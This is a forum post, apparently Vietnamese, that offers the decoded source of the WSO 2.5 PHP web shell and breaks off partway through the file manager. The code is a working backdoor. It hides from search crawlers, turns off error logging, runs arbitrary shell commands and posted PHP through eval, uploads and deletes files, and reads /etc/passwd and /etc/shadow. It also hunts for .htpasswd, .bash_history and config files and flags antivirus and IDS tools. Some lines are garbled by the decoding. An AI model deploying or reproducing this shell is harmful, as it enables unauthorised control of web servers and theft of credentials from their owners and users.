| code PHP mã hóa unphp.net Posted: 03 Apr 2015 11:10 AM PDT 
Custom Function and Regex Support UnPHP handles custom decoder functions and regular expressions. The example below uses the d1() function and preg_replace() with the execute flag set. Mã PHP:
<?php ?><?php
$auth_pass = "a23943a5edc56f796ea1aeeb57f78dd4";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');
if (get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin() {
die("<pre align=center><form method=post> <input type=password name=pass><input type=submit value='>>'></form></pre>");
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if (!empty($auth_pass)) {
if (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) ]) || ($_COOKIE[md5($_SERVER['HTTP_HOST']) ] != $auth_pass)) wsoLogin();
}
if (strtolower(substr(PHP_OS, 0, 3)) == "win") $os = 'win';
else $os = 'nix';
$safe_mode = @ini_get('safe_mode');
if (!$safe_mode) error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if (isset($_POST['c'])) @chdir($_POST['c']);
$cwd = @getcwd();
if ($os == 'win') {
$home_cwd = str_replace("\", " / ", $home_cwd);
$cwd = str_replace("", " / ", $cwd);
}
if($cwd[strlen($cwd) - 1] != '/')
$cwd .= '/';
if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;
if($os == 'win')
$aliases = array(
"ListDirectory" => "dir",
"Findindex . phpincurrentdir" => "dir / s / w / bindex . php",
"Find * config * . phpincurrentdir" => "dir / s / w / b * config * . php",
"Showactiveconnections" => "netstat - an",
"Showrunningservices" => "netstart",
"Useraccounts" => "netuser",
"Showcomputers" => "netview",
"ARPTable" => "arp - a",
"IPConfiguration" => "ipconfig / all"
);
else
$aliases = array(
"Listdir" => "ls - lha",
"listfileattributesonaLinuxsecondextendedfilesystem" => "lsattr - va",
"showopenedports" => "netstat - an | grep - ilisten",
"processstatus" => "psaux",
"Find" => "",
"findallsuidfiles" => "find / -typef - perm - 04000 - ls",
"findsuidfilesincurrentdir" => "find . -typef - perm - 04000 - ls",
"findallsgidfiles" => "find / -typef - perm - 02000 - ls",
"findsgidfilesincurrentdir" => "find . -typef - perm - 02000 - ls",
"findconfig . inc . phpfiles" => "find / -typef - nameconfig . inc . php",
"findconfig * files" => "find / -typef - name"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv");
function wsoHeader() {
if (empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset'];
global $color;
echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION . "</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: $color !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
var a_ = '" . htmlspecialchars(@$_POST['a']) . "'
var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';
var p1_ = '" . ((strpos(@$_POST['p1'], "
") !== false) ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';
var p2_ = '" . ((strpos(@$_POST['p2'], "
") !== false) ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';
var p3_ = '" . ((strpos(@$_POST['p3'], "
") !== false) ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';
var d = document;
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = 'ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject('Microsoft.XMLHTTP');
if (req) {
req.onreadystatechange = processReqChange;
req.open('POST', url, true);
req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
req.send(params);
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp(\"(\d+)([\S\s]*)\", 'm');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace ? $totalSpace : 1;
$release = @php_uname('r');
$kernel = @php_uname('s');
$explink = 'http://exploit-db.com/search/?action=search&filter_description=';
if (strpos('Linux', $kernel) !== false) $explink.= urlencode('Linux Kernel ' . substr($release, 0, 6));
else $explink.= urlencode($kernel . ' ' . substr($release, 0, 3));
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n = count($path);
for ($i = 0;$i < $n - 1;$i++) {
$cwd_links.= "<a href='#' onclick='g(\"FilesMan\",\"";
for ($j = 0;$j <= $i;$j++) $cwd_links.= $path[$j] . '/';
$cwd_links.= "\")'>" . $path[$i] . "/</a>";
}
$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
$opt_charsets = '';
foreach ($charsets as $item) $opt_charsets.= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>';
$m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network');
if (!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout';
$m['Self remove'] = 'SelfRemove';
$menu = '';
foreach ($m as $k => $v) $menu.= '<th width="' . (int)(100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>';
$drives = "";
if ($GLOBALS['os'] == 'win') {
foreach (range('c', 'z') as $drive) if (is_dir($drive . ':\'))
$drives .= ' < ahref = "#"onclick = "g(\'FilesMan\',\''.$drive.':/\')" > ['.$drive.'] < / a > ';
}
echo ' < tableclass = infocellpadding = 3cellspacing = 0width = 100 % > < tr > < tdwidth = 1 > < span > Uname: < br > User: < br > Php: < br > Hdd: < br > Cwd:
' . ($GLOBALS['os'] == 'win'?' < br > Drives:
':'') . ' < / span > < / td > '
. ' < td > < nobr > ' . substr(@php_uname(), 0, 120) . ' < ahref = "' . $explink . '"target = _blank > [exploit - db . com] < / a > < / nobr > < br > ' . $uid . '(' . $user . ') < span > Group: < / span > ' . $gid . '(' . $group . ') < br > ' . @phpversion() . ' < span > Safemode: < / span > ' . ($GLOBALS['safe_mode']?' < fontcolor = red > ON < / font > ':' < fontcolor = green > < b > OFF < / b > < / font > ')
. ' < ahref = # onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'
. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
}
function wsoFooter() {
$is_writable = is_writable($GLOBALS['cwd']) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>";
echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
<tr>
<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>
<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
<td><form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMAn'>
<input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
</tr></table></div></body></html>";
}
if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false)) {
function posix_getpwuid($p) {
return false;
}
}
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false)) {
function posix_getgrgid($p) {
return false;
}
}
function wsoEx($in) {
$out = '';
if (function_exists('exec')) {
@exec($in, $out);
$out = @join("
", $out);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in, "r"))) {
$out = "";
while (!@feof($f)) $out.= fread($f, 1024);
pclose($f);
}
return $out;
}
function wsoViewSize($s) {
if (is_int($s)) $s = sprintf("%u", $s);
if ($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824) . ' GB';
elseif ($s >= 1048576) return sprintf('%1.2f', $s / 1048576) . ' MB';
elseif ($s >= 1024) return sprintf('%1.2f', $s / 1024) . ' KB';
else return $s . ' B';
}
function wsoPerms($p) {
if (($p & 0xC000) == 0xC000) $i = 's';
elseif (($p & 0xA000) == 0xA000) $i = 'l';
elseif (($p & 0x8000) == 0x8000) $i = '-';
elseif (($p & 0x6000) == 0x6000) $i = 'b';
elseif (($p & 0x4000) == 0x4000) $i = 'd';
elseif (($p & 0x2000) == 0x2000) $i = 'c';
elseif (($p & 0x1000) == 0x1000) $i = 'p';
else $i = 'u';
$i.= (($p & 0x0100) ? 'r' : '-');
$i.= (($p & 0x0080) ? 'w' : '-');
$i.= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
$i.= (($p & 0x0020) ? 'r' : '-');
$i.= (($p & 0x0010) ? 'w' : '-');
$i.= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-'));
$i.= (($p & 0x0004) ? 'r' : '-');
$i.= (($p & 0x0002) ? 'w' : '-');
$i.= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-'));
return $i;
}
function wsoPermsColor($f) {
if (!@is_readable($f)) return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
elseif (!@is_writable($f)) return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
else return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
}
function wsoScandir($dir) {
if (function_exists("scandir")) {
return scandir($dir);
} else {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh))) $files[] = $filename;
return $files;
}
}
function wsoWhich($p) {
$path = wsoEx('which ' . $p);
if (!empty($path)) return $path;
return false;
}
function actionSecInfo() {
wsoHeader();
echo '<h1>Server security information</h1><div class=content>';
function wsoSecParam($n, $v) {
$v = trim($v);
if ($v) {
echo '<span>' . $n . ': </span>';
if (strpos($v, "
") === false) echo $v . '<br>';
else echo '<pre class=ml1>' . $v . '</pre>';
}
}
wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
if (function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none');
wsoSecParam('Open base dir', @ini_get('open_basedir'));
wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
wsoSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no');
$temp = array();
if (function_exists('mysql_get_client_info')) $temp[] = "MySql (" . mysql_get_client_info() . ")";
if (function_exists('mssql_connect')) $temp[] = "MSSQL";
if (function_exists('pg_connect')) $temp[] = "PostgreSQL";
if (function_exists('oci_connect')) $temp[] = "Oracle";
wsoSecParam('Supported databases', implode(', ', $temp));
echo '<br>';
if ($GLOBALS['os'] == 'nix') {
wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no');
wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no');
wsoSecParam('OS version', @file_get_contents('/proc/version'));
wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
if (!$GLOBALS['safe_mode']) {
$userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
$danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja');
$downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
echo '<br>';
$temp = array();
foreach ($userful as $item) if (wsoWhich($item)) $temp[] = $item;
wsoSecParam('Userful', implode(', ', $temp));
$temp = array();
foreach ($danger as $item) if (wsoWhich($item)) $temp[] = $item;
wsoSecParam('Danger', implode(', ', $temp));
$temp = array();
foreach ($downloaders as $item) if (wsoWhich($item)) $temp[] = $item;
wsoSecParam('Downloaders', implode(', ', $temp));
echo '<br/>';
wsoSecParam('HDD space', wsoEx('df -h'));
wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
$temp = "";
for (;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
$uid = @posix_getpwuid($_POST['p2']);
if ($uid) $temp.= join(':', $uid) . "
";
}
echo '<br/>';
wsoSecParam('Users', $temp);
}
}
} else {
wsoSecParam('OS Version', wsoEx('ver'));
wsoSecParam('Account Settings', wsoEx('net accounts'));
wsoSecParam('User Accounts', wsoEx('net user'));
}
echo '</div>';
wsoFooter();
}
function actionPhp() {
if (isset($_POST['ajax'])) {
WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
ob_start();
eval($_POST['p1']);
$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\'") . "';
";
echo strlen($temp), "
", $temp;
exit;
}
if (empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
wsoHeader();
if (isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace(array('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU',), array('', '.e, .v, .h, .h th {$1}', ''), $tmp);
echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
}
echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">';
echo ' <input type=checkbox name=ajax value=1 ' . ($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>';
if (!empty($_POST['p1'])) {
ob_start();
eval($_POST['p1']);
echo htmlspecialchars(ob_get_clean());
}
echo '</pre></div>';
wsoFooter();
}
function actionFilesMan() {
if (!empty($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']);
if (!empty($_POST['p1'])) {
switch ($_POST['p1']) {
case 'uploadFile':
if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!";
break;
case 'mkdir':
if (!@mkdir($_POST['p2'])) echo "Can't create new dir";
break;
case 'delete':
function deleteDir($path) {
$path = (substr($path, -1) == '/') ? $path : $path . '/';
$dh = opendir($path);
while (($item = readdir($dh)) !== false) {
$item = $path . $item;
if ((basename($item) == "..") || (basename($item) == ".")) continue;
$type = filetype($item);
if ($type == "dir") deleteDir($item);
else @unlink($item);
}
closedir($dh);
@rmdir($path);
}
if (is_array(@$_POST['f'])) foreach ($_POST['f'] as $f) {
if ($f == '..') continue;
$f = urldecode($f);
if (is_dir($f)) deleteDir($f);
else @unlink($f);
}
break;
case 'paste':
if ($_COOKIE['act'] == 'copy') {
function copy_paste($c, $s, $d) {
if (is_dir($c . $s)) {
mkdir($d . $s);
$h = @opendir($c . $s);
while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c . $s . '/', $f, $d . $s . '/');
} elseif (is_file($c . $s)) @copy($c . $s, $d . $s);
}
foreach ($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']);
} elseif ($_COOKIE['act'] == 'move') {
function move_paste($c, $s, $d) {
if (is_dir($c . $s)) {
mkdir($d . $s);
$h = @opendir($c . $s);
while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c . $s . '/', $f, $d . $s . '/');
} elseif (@is_file($c . $s)) @copy($c . $s, $d . $s);
}
foreach ($_COOKIE['f'] as $f) @rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f);
} elseif ($_COOKIE['act'] == 'zip') {
if (class_exists('ZipArchive')) {
$zip = new ZipArchive();
if ($zip->open($_POST['p2'], 1)) {
chdir($_COOKIE['c']);
foreach ($_COOKIE['f'] as $f) {
if ($f == '..') continue;
if (@is_file($_COOKIE['c'] . $f)) $zip->addFile($_COOKIE['c'] . $f, $f);
elseif (@is_dir($_COOKIE['c'] . $f)) {
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/', FilesystemIterator::SKIP_DOTS));
foreach ($iterator as $key => $value) {
$zip->addFile(realpath($key), $key);
}
}
}
chdir($GLOBALS['cwd']);
$zip->close();
}
}
} elseif ($_COOKIE['act'] == 'unzip') {
if (class_exists('ZipArchive')) {
$zip = new ZipArchive();
foreach ($_COOKIE['f'] as $f) {
if ($zip->open($_COOKIE['c'] . $f)) {
$zip->extractTo($GLOBALS['cwd']);
$zip->close();
}
}
}
} elseif ($_COOKIE['act'] == 'tar') {
chdir($_COOKIE['c']);
$_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
chdir($GLOBALS['cwd']);
}
unset($_COOKIE['f']);
setcookie('f', '', time() - 3600);
break;
default:
if (!empty($_POST['p1'])) {
WSOsetcookie('act', $_POST['p1']);
WSOsetcookie('f', serialize(@$_POST['f']));
WSOsetcookie('c', @$_POST['c']);
}
break;
}
}
wsoHeader();
echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
$dirContent = wsoScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
if ($dirContent === false) {
echo 'Can\'t open this folder!';
wsoFooter();
return;
}
global $sort;
$sort = array('name', 1);
if (!empty($_POST['p1'])) {
if (preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]);
}
echo "<script>
function sa() {
for(i=0;i<d.files.elements.length;i++)
if(d.files.elements[i].type == 'checkbox')
d.files.elements[i].checked = d.files.elements[0].checked;
}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>";
$dirs = $files = array();
$n = count($dirContent);
for ($i = 0;$i < $n;$i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i]));
if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file'));
elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir'));
}
$GLOBALS['sort'] = $sort;
function wsoCmp($a, $b) {
if ($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
else return (($a['size'] < $b['size']) ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
}
usort($files, "wsoCmp");
usort($dirs, "wsoCmp");
$files = array_merge($dirs, $files);
$l = 0;
foreach ($files as $f) {
echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . (($f['type'] == 'file') ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . (($f['type'] == 'file') ? wsoViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . (($f['type'] == 'file') ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>';
$l = $l ? 0 : 1;
}
echo "<tr><td colspan=7>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
